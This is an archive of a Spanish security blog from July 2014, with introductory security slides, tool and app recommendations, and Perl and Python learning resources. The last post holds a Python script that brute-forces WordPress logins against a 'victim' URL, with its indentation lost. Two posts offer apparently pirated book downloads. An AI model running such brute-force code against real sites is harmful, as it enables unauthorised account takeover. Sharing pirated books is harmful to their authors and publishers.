Este blog ya no está activo, sigue informándote aquí:

jueves, 31 de julio de 2014

Nmap.- Fortificado Con Vulscan

Segundo día después de tener una fuente de Internet aceptable y echando mano de recomendaciones tal y como os dije en entradas anteriores. Hoy os recomendaré una  entrada que hizo mi buen amigo Snifer, al cual tengo un poco olvidado ahora que estoy de vacaciones. 

Snifer hablaba de como fortificar Nmap, usando Vulscan un Nmap Script Engine capaz de buscar vulnerabilidades y de la procedencia de todos los cvs que utiliza Vulscan.  Con lo ultimo (el tema de los .cvs) me ha dado la idea de crear un scaner de vulnerabilidades propio, ya sabéis lo que me gusta hacerme mis propias herramientas si puedo. Así que, creo que será un proyecto bastante chulo para afrontarlo este verano. 

Os recomiendo que os leáis la entrada ya que deja ejemplos de como utilizar este NSE junto a Nmap (canela fina xD): 

miércoles, 30 de julio de 2014

Slides.- Seguridad Informatica Para Todos

Después de un día haciendo lo imposible "guiño guiño" para tener Internet, he hecho un poco de repaso a todas esas micro-entradas que tenía pendiente publicarlas o que me han servido para armar las que ya habéis visto. 

Hoy os voy a dejar el enlace a unas Slides que me sirvieron como guía para la serie de entradas de Introducción a la Seguridad Informática  que habéis podido ver. La verdad es que me gustaron mucho por el humor y la personalidad que derrochan y si yo hubiera podido agregarle esa pizca de humor a las mías lo habría hecho sin dudarlo.

Las podéis ver y descargar desde este enlace:

Sed Buenos ;) 

lunes, 28 de julio de 2014

Video.- El Decalogo de Seguridad del Maligno.

Como algunos de vosotros ya os habréis dado cuenta, hoy he empezado las vacaciones. Esto no quiere decir que deje la seguridad informática de lado, es mas, aún hay algunos asuntos que se han de preparar para setiembre. Pero, si que habrán mas infografias o videos en este blog a no ser que esté tocando algo que tenga muchísimas ganas de explicaros.


Dicho esto, antes de partir, me he estado empapando algunos videos que tenia guardados para estas ocasiones. Este me ha gustado mucho, ya que seguro que todos habéis oído hablar del Maligno o de Chema Alonso. Bueno, pues que sepáis que también tiene un canal de youtube y cuando le da sube videos. La mayoría son de ponencias suyas y la verdad es que merece que les echéis un ojo. 


Aquí tenéis su canal de Youtube:

Sed Buenos ;) 

domingo, 27 de julio de 2014

Video.- Bugtraq Optimus Explicado Por Bugtraq Team

Como ya os anuncié ayer, en unas lineas un poco offtopic para lo que son mis entradas, la nueva versión de la distro de Bugtraq Team ya ha visto la luz y os la podéis descargar desde el siguiente enlace:


La verdad es que esperaba la llegada de esta distribución destinada a la seguridad informática.Así que es hora de darle caña y que mejor manera de hacerlo que empapándome el vídeo que han hecho la gente de Bugtraq y que espero que a todos os guste y aprendáis con el. 


Sed Buenos con esto ;) 

sábado, 26 de julio de 2014

Infografia.- Facebook Puede Rastrearte Incluso Si No Tienes Cuenta.

Gracias a las famosisimas Cookies que las paginas webs incrustan en nuestro navegador Facebook es capaz de rastrearte. Aunque solo guarda las características de tu equipo y puede ver tus búsquedas lo hace sin que hayas querido utilizar el servicio. Así que,  si habéis pasado por la pagina principal de Dacebook alguna vez en vuestra vida y no habéis limpiado las cookies Facebook aun os persigue. 



Para mas información y fuente de la noticia:


OJO en 30 minutos tendreis la nueva versión de la distribución linux Bugtraq.  Estad atentos a este enlace:
Sed Buenos ;) 

Slide.- Introducción a la Seguridad Informatica. [7] (Protección: Sniffing, Spoofing y Hijacking)

Viernes por la noche/sábado por la mañana y hoy acabo con estas Slides, espero que os hayan gustado y también os voy a dejar una versión con todas las Slides juntas para aquellos que no queráis tragaros las 7 entradas. 

Hoy he hablado sobre medidas de Protección frente al Sniffing, Spoofing y Hijacking todas utilizando el sentido común y espero desarrollar la parte técnica a través de las practicas. También hay muchas medidas de protección que se nombran en otros puntos de la misma formación por lo que no pienso ser repetitivo. 

Espero que os guste: 


Aquí os dejo el pack completo para que me deis vuestra opinión (56 Diapositivas, se dice rápido):


"Me encantaría que me dejarais en los comentarios opiniones, criticas y mejoras que vosotros le haríais. Así yo también aprendo a hacer mejores Slides y la formación estará mas completa."
Sed Buenos ;) 

jueves, 24 de julio de 2014

Slide.- Introducción a la Seguridad Informatica. [6] (Sniffing, Spoofing y Hijacking)

Hoy toca hablar de Sniffing, Spoofing y Hijacking. La verdad es que me ha costado un poco montar estas Slides y si fuera por mi lo explicaría todo desde un enfoque mas básico. (Lo cual dependiendo del nivel que vea si que lo haré) Bueno, dicho esto, espero que os guste.  Los que llevais tiempo en el mundo de la seguridad informática no os vendrá de nuevo pero a los que os esta gustando y queréis aprender un poco mas quizás si.

Os dejo la Slide aquí: 


Ojo, el tocho manual aun no está actualizado ya que he de empaparme bien de las herramientas de auditoria IDEA y ACL. 
"Me encantaría que me dejarais en los comentarios opiniones, criticas y mejoras que vosotros le haríais. Así yo también aprendo a hacer mejores Slides y la formación estará mas completa."
Sed Buenos ;) 

miércoles, 23 de julio de 2014

Slide.- Introducción a la Seguridad Informatica. [5] (Introducción al Malware)

Como bien os dije ayer este viernes es el ultimo día, si me he distribuido bien el tiempo, en el que subiré esta serie de entradas dado que la formación ya tendrá todos los puntos que me han pedido y pasara a estar en fase de evaluación. Está claro que todos los puntos que pongo en estas Slides irán con su correspondiente explicación, anécdotas y algún que otro experimento. Siendo sinceros el puntos que me da mas miedo es el de mañana. 

Bueno, dicho esto, os dejo las slides relacionadas con el Malware. Espero que os gusten.


Como no, podéis ver mas contenido en el "tocho manual" de la formación:

Estas Sildes no hubieran sido posibles sin la gran ayuda que es para todos:


"Me encantaría que me dejarais en los comentarios opiniones, criticas y mejoras que vosotros le haríais. Así yo también aprendo a hacer mejores Slides y la formación estará mas completa."

Sed Buenos ;) 

PD:  Mañañana halaremos de Sniffing, Spoofing y Hijacking. Crucemos los dedos xD 

Slide.- Introducción a la Seguridad Informatica. [4] (Vulnerabilidades, Exploits y Actualizaciones)

Ayer, cuando repase la Slide de ayer me di cuenta que había metido mas temario del que tocaba en el punto de las vulnerabilidades. Así que lo que he hecho es dedicarle toda la Slide de ayer al punto de la formación por que me parece que las vulnerabilidades y los exploits son un tema que se ha de tratar de la mano. También he  optado por hacerle caso a Snifer de una vez y aportar un glosarios un poco mas extenso que solo el sombre de los Hackers de sombrero de color y una introducción a CVE.

Working working ... 

Slides Actualizadas: 
Como siempre en el "tocho manual" dejo alguna que otra pincelada mas para que la formación sea mas completa.  Espero que os guste,  a mi me hubiera gustado que un profe me diera todo de esta forma. 
Sed Buenos y aguantad que en tres días acabos las Slides. ;) 

lunes, 21 de julio de 2014

Slide.- Introducción a la Seguridad Informatica. [3] (Vulnerabilidades)

Ya es lunes y volvemos con la serie de Slides para la Formación que tendré que dar en Septiembre y ya que la hago desde zero pues os las cuelgo para que me ayudéis y aprendáis.  Ademas, ya me va bien repasarlo todo desde zero así refresco conocimientos. Bueno, dicho esto,  os dejo el nuevo punto que he hecho hoy. Esta dedicado a aprender que es una vulnerabilidad, cuales hay y como podemos luchar contra ellas. 

Aquí os dejo la presentación y espero que os guste:


También he actualizado el "tocho manual" por si queréis mas información: 
Estas Sildes no hubieran sido posibles sin la gran fuente de información que son:
"Me encantaría que me dejarais en los comentarios opiniones, criticas y mejoras que vosotros le haríais. Así yo también aprendo a hacer mejores slides y la formación estará mas completa."
Slides Antiguas: 


Sed Buenos ;)

domingo, 20 de julio de 2014

Canal Pirata de Snifer XXV - Aprende HTML5 sin escusas.. PARTE I

Otro dormingo que venimos al rincon de @State_X aka el gringuito ;) con el canal pirata de Snifer en esta oportunidad les presento un pequeño, pack de libros referentes a html5 asi que a dar rienda suelta a su imaginación :).


HTML5 Canvas CookbookHtml5 Boilerplate Web Development
What Is HTML5HTML5 Geolocation
HTML5 HacksHTML5 for Publishers
HTML5: Up and RunningHTML5 Media

Descargar Libros: Aquí
Regards,
Snifer

sábado, 19 de julio de 2014

Slide.- Introducción a la Seguridad Informatica. [2] (Conociendo a la Comunidad)

Siguiendo con esta serie de entradas, hoy os dejo la segunda parte de la formación. Esta parte no está en los objetivos pero a mi me parece algo esencial conocer a una comunidad tan rica. Ademas, aprovechando que casi todos los cracks en esto tienen un blog y hay paginas especializadas en noticias sobre seguridad como Una al Dia, la cantidad de información diaria es esencial para el desarrollo de un estudiante de seguridad. 


Se que con tantos logos no se entiende de todo bien y que a mas de uno le gustaría tener toda esta información. Así que también os he subido el "tocho manual" (como yo le llamo) el cual iré actualizando con la información del curso.

Manual:

"Me encantaría que me dejarais en los comentarios opiniones, criticas y mejoras que vosotros le haríais. Así yo también aprendo a hacer mejores slides y la formación estará mas completa."
 Como os debo una entrada la guardare para las posibles actualizaciones que me vayáis mandando por los comentarios.

Sed Buenos y espero que os guste ;)

Slide.- Introducción a la Seguridad Informatica. [1] (Muy Basico)

Hace tiempo que quería volver a subir slides y la verdad es que hacia un mas tiempo que os había prometido que subiría algunas mas. Pues hoy, ya que estoy preparando slides para una formación he decidido que os las voy a ir subiendo a medida que vaya haciendo. Es una formación sobre seguridad informática bastante básica pero bastante extensa. Así que, ya me va bien a mi para repasar cosas que creía sabidas y espero que a vosotros os gusten. 


Me encantaría que me dejarais en los comentarios opiniones, criticas y mejoras que vosotros le haríais. Así yo también aprendo a hacer mejores slides y la formación estará mas completa.

Sed Buenos ;) 

viernes, 18 de julio de 2014

Malwarebytes.- Haciéndonos La Vida Mas Fácil.

Los que hayan tratado conmigo por algún problema informático ya lo sabrán, pero para los que no, yo siempre he recomendado hacer una pasada con el Anti-Malware de Malwarebytes antes de meterme en cosas mas serias. Malwarebytes era un anti-malware de pago donde podías descargarte una versión de prueba que se actualizaba al acto e iba genial. Pero ahora no, Ahora podemos disponer de una versión totalmente gratuita pero sin escudo en tiempo real y de una versión premium donde se sigue manteniendo la descarga de prueba. 


En mi opinión me parece genial que existan estas dos versiones yo seguiré con la versión de prueba pero, siempre se agradece tener una versión completamente free. Ademas,  rebuscando por la web del equipo de Malwarebytes podemos encontrar bastantes herramientas gratuitas que nos ayudarán a mejorar la seguridad de nuestros equipos. 

Pagina de descarga de herramientas: 

Me encanta que las empresas de seguridad empiecen a mimar al usuario de esta manera. La verdad, merecen mucho la pena y espero que les echéis un ojo. 

Sed Buenos ;) 

martes, 15 de julio de 2014

CheckiO.- El Videojuego Para Aprender Python

La verdad es que Python es un lenguaje muy fácil de aprender y con muchísimas posibilidades, tanto es así, que muchas universidades ya están introduciendo Python como lenguaje de introducción. Ademas cada vez están saliendo nuevas oportunidades de aprenderlo y hasta de forma interactiva. CheckiO es un Videojuego donde se plantean retos, subes niveles y hasta desbloqueas nuevas zonas. 


Totalmente recomendado. Ademas, los retos son bastante difíciles así que para quien quiera superarse aquí os dejo el enlace.
  • http://www.checkio.org/
Sed Buenos ;) 

Infografia.- ¿Como Puedo Proteger Mi Facebook?

La verdad y por muy fácil que parezca concienciar a las personas de que hagan un buen uso de sus redes sociales puede llegar a ser algo tedioso si tenemos que explicarle que comporta el Https, que la app de su smartphone aunque se conecte de forma igual a su cuenta puede ser vulnerada ya que no esta bajo la protección de su pc, etc. Para eso y para que todos lo sigáis que no cuesta nada mantener vuestro Facebook seguro. 

 Sed Buenos y seguid estos consejos que los de Kaspersky saben ^^

domingo, 13 de julio de 2014

Canal Pirata de Snifer XXIV - Recopilación de Documentos sobre Perl

El dia viernes vi que el gringuito andaba yendose por Perl ¬_¬° y no fue capaz de dcirme snifito snifito donde puedo conseguir libritos de Perl :'( me tiene olvidado....

Hablando enserrio, como asben ando un poco perdido desde el miercoles o jueves retorne al blog, a dar mas impulso a lo que me apasiona, como tambien me olvide de nuestro amigo gringo, con las entradas piratas del canal :), ya que lleva Albert con Perl comenzando hacemos un pequeño pack por decirlo para que pueda meterse a fondo en este lenguaje hace un año y algo mas tuve el gusto de conocer algo de este lenguaje y me parecio bastante facil de aprender pero no le tome mucho interes, xD quizas porque andaba mal luego de la operación pero que va este recopilator se viene de mi blog que data de Febrero del 2013  lo postee en ese entonces como:

Recopilación de Documentos sobre Perl

En esta oportunidad venimos con lo mismo :)


Perl Tutorial Hub  este fue el primero que di una excelente recopilación de documentos


Cheat Sheets 



Perl for dummies Cheat Sheet




Documentacion en Español

Manuales en Web Taller
Tutorial de Perl
Introducción al Lenguaje Perl

Documentacion Ingles

Perl.org
PerlDoc
OPP in Perl
Perl Functions References


Se que mi querido amigo Albert lo tomara mas a fondo porque quiere engendrar algo de el en Gojira ;), asi que a darle duro querido amigo.

Regards,
Snifer

sábado, 12 de julio de 2014

Wickr.- Top-Secret Messenger

Todo el mundo que este medio metido en este mundo sabe que muchos de nosotros vivimos en una constante paranoia y no nos fiamos ni de [Telegram] por razones obvias. La CiberSeguridad es una diciplinar en constante actualización y crecimiento. Sobretodo ahora que la gente esta empezando a ver lo importante que es la seguridad en su cibervida o al menos para que no le roben el Wifi. Por eso, me encanta encontrarme con sistemas de mensajería cada vez mas seguros. 


Wickr es una aplicación de mensajería como lo son Watssap o Telegram desarrollada por la hacker [Nico Sell], fundadora de [r00tz] y una de las organizadoras de la popular conferencia [DEFCON]. Así que de segurida, esta mujer sabe. Ademas esta desarrollada para Android e IOS. 

Opciones de seguridad que nos ofrece esta app: 
  • La comunicación se realiza utilizando redes Peer-to-Peer cifradas y no hay servidores centralizados.
  • El ID y la la información del dispositivo son hasheadas criptográficamente con múltiples rondas de SHA256 + SALT
  • Los datos en reposo y en tránsito se cifran con AES256
  • La contraseña y los hashes de la contraseña no se dejan en el dispositivo
  • Los mensajes son eliminados de forma forense (wipping) después de que caducan
  • Las claves se utilizan una única vez y se regeneran en cada mensaje
  • Los mensajes son cifrados y descifrados en origen y destino
  • El contacto entre usuarios y los servidores de Wickr, se realiza sólo utilizando canales cifrados
  • Wickr nunca entra en contacto con las contraseñas de cifrado
  • Wickr borra los mensajes despues de la entrega
La verdad es que ahora mismo voy a probarla a ver si le puedo sacar alguna pega. Pero, se ve genial desde mi punto de vista y el wipping de los mensajes me ha enamorado. 

Para descargar esta app os direcciono a la fuente de esta entrada. Así le dais una visita ya que merece la pena que todos la conozcáis: 

viernes, 11 de julio de 2014

Aprendiendo Perl.- Teach Yourself Perl 5 in 21 days

Hace unos días buscando tutoriales/libros/paginas parecidas a Codecademy para aprender Perl, encontré este libro el cual, me recuerda muchísimo a [Learn Python The Hard Way] y la verdad es que estoy aprendiendo muchísimo con el. Así que os lo recomiendo encarecidamente. 


Enlace al Libro: 
He de ponerme al dia en Perl si quiero programar algún modulo para [g0jira], así que a por todas ò-ó espero que os interese tanto como a mi. 

Sed Buenos y divertiros desarrollando ;) 

jueves, 10 de julio de 2014

Programar y Hackear [5].- Una Aproximación A Un Advance Brute Force WordPress

Como ayer os [prometí], hoy me he estado gran parte de esta mañana intentando mejorar el Simple Brute Force para WordPress. Que aunque ponga WordPress en el titulo de la entrada es extrapolable a otras paginas con sistemas de login parecidos. Esto es una aproximación que he hecho con el tiempo que he podido por lo que, no funciona bien pero es un avance y me sirve para explicaros lo que en realidad quiero hacer con este script. 


Si os fijáis en el código de abajo, le he agregado una segunda opción y lo he arreglado un poco para que sea mas claro y no estorbe el código. En una de ellas he respetado el codigo original cambiando solo una variable mientras que en la otra he usado la magia de "split()" para separar strings, guardarlos en una lista para usarlos luego como passwords para el ataque. 


import mechanize
import urllib

def ataque(passwords):
usuario = raw_input("Usuario: ")
for password in passwords: 

r = br.open(url2)
br.select_form(nr=0)
br.form["log"] = usuario
br.form["pwd"] = password
br.submit()
respuesta = br.response().geturl()

if respuesta == url + "/wp-admin/":
print usuario + " : " + password + "--> Si"
else:
print usuario + " : " + password + "--> No" 

br = mechanize.Browser()
url = raw_input("URL http://victima.com: ")
url2 = url + "/wp-login.php"

d1 =  raw_input("[a= usar tu propio dicionario] [b= hacer uno con strings de la pagina]: ")

if d1 == "a": 

archivo = open('lista.txt', 'r')
diccionario = archivo.readlines()
ataque(diccionario)

elif d1 == "b":

busqueda = urllib.urlopen(url).read()
datos= busqueda.split()
d3 = str(datos)
diccionario2 = open('Strings.txt', 'a+')
diccionario2.writelines(d3)
ataque(diccionario2)

else: 
print "solo entiende a o b ..."

Espero que os guste y iremos mejorando este script a medida que pase el tiempo hasta que podamos limar estos slipts hasta convertirlos solamente en palabras para usarlos como contraseña. Ya que Wordpress no limita un ataque de fuerza bruta.

Sed Buenos con esto ;)